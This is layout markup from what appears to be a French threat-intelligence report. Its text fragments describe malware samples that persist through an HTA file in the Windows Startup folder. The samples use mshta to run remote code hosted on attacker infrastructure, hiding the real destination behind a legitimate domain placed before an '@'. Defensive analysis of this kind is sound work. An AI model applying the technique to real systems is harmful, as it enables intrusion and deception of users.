            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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faa8ad6b2e1ea447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8864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7094485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2339752" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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975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aming_Microsoft_Windows_Start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98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7271015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5631fc6e317d3d2b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091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7271015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Menu_Programs_Startup_11-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1936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7447545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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967_10.11.2025.HTA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2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7788498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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L'extraction des commandes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utilisées par ces échantillons montre une forte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3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8003763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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homogénéité des techniques employées. La plupart utilisent directement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5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8200413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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exécuter une ressource distante hébergée sur des infras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tr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uctures contrôlées par l'acteur, tout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6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8392383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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en insérant un domaine légitime avant le caractère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@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afin de masquer visuellement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7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8589033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1130106" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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01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destination réelle.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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2512059</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8905263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377073" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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0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9104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4278629</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8988648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1243799" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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379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Commande </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle35"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">mshta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0128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1207135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8991623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757272" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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7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1152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2333625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9078618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="695684" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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6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présumée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21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9423665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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  <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">b58e7bddd9d2fcd1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3200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9423665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2186082" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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608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  <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">%WINDIR%\system32\mshta.exe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422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8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524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8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627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729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1139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71514" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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523874">
                          <a:moveTo>
                            <a:pt x="2190750" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="52387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332865" y="523874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548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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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590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590675">
                          <a:moveTo>
                            <a:pt x="0" y="1590675"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1590675"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="707390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="707390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1590675"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2190750" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="706754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70675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2222509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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4">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="88328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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="88328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163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3106429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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5">
                          <a:moveTo>
                            <a:pt x="0" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2190750" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="883285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470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3990349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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4">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="88328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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="88328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777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4874269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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4">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="133286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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="88328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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="88328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084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5758189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5772150" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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150" cy="14039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2150" h="1403985">
                          <a:moveTo>
                            <a:pt x="0" y="889634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403985"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403985"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2191385" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772150" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5772150" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2191385" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2191385" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135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2896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7276474</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="326389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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326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326389">
                          <a:moveTo>
                            <a:pt x="0" y="162559"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="162559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="326389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="326389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162559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62559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162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801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7602864</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1935479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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9354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935479">
                          <a:moveTo>
                            <a:pt x="228600" y="1663065"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1663065"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1935479"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1935479"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1663065"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1221104"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1221104"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1663700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1663700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1221104"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="608329"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="608329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1221740"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1221740"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="608329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608329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="60832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108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71514" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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523874">
                          <a:moveTo>
                            <a:pt x="2190750" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="52387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332865" y="523874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518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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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590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590675">
                          <a:moveTo>
                            <a:pt x="0" y="1590675"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1590675"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="707390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="707390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1590675"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2190750" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="706754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="70675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82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2222509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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4">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="88328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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="88328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132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3106429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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5">
                          <a:moveTo>
                            <a:pt x="0" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2190750" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="883285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440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3990349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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4">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1332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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="88328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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="88328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747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4874269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="133286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2190750" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333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054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5758189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5772150" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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150" cy="14039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2150" h="1403985">
                          <a:moveTo>
                            <a:pt x="0" y="889634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1403985"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403985"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="2191385" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772150" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5772150" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2191385" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2191385" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2190750" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135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259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7276474</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="326389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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326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326389">
                          <a:moveTo>
                            <a:pt x="0" y="162559"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="162559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="326389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="326389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162559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62559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="162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771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7602864</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1935479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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9354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935479">
                          <a:moveTo>
                            <a:pt x="228600" y="1663065"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1663065"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1935479"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1935479"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1663065"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1221104"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1221104"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1663700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1663700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1221104"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="608329"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="608329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1221740"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1221740"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="608329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608329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="60832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692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78500" cy="5657849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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5657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5657849">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5657849"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5654675"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5778500" y="5654675"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4770755"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="4770755"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3886834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="3886834"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3002915"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="3002915"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2118995"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="2118995"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1235074"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="1235074"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="577850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8976" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2233930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="857253" cy="5645149"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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7253" cy="5645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7250" h="5645149">
                          <a:moveTo>
                            <a:pt x="857250" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="857250" y="5645149"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="56451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8432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990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="6612254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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66122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6612254">
                          <a:moveTo>
                            <a:pt x="3174" y="6612254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="6449059"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="6449059"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="6612254"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="6449059"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="6286500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="6286500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="6449059"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="6612254"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="6449059"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="6609080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="6609080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="6609080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="6609080"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="6449059"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="6612254"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="6449059"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="6286500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="6286500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="6449059"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6289674"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5874384" y="6289674"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6289674"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5874384" y="6289674"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5829299" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5829299" y="56578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945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1504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2512059</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377073" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0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2528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4278629</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1085438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1243799" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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379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Commande </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle35"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">mshta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3552" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1207135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757272" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
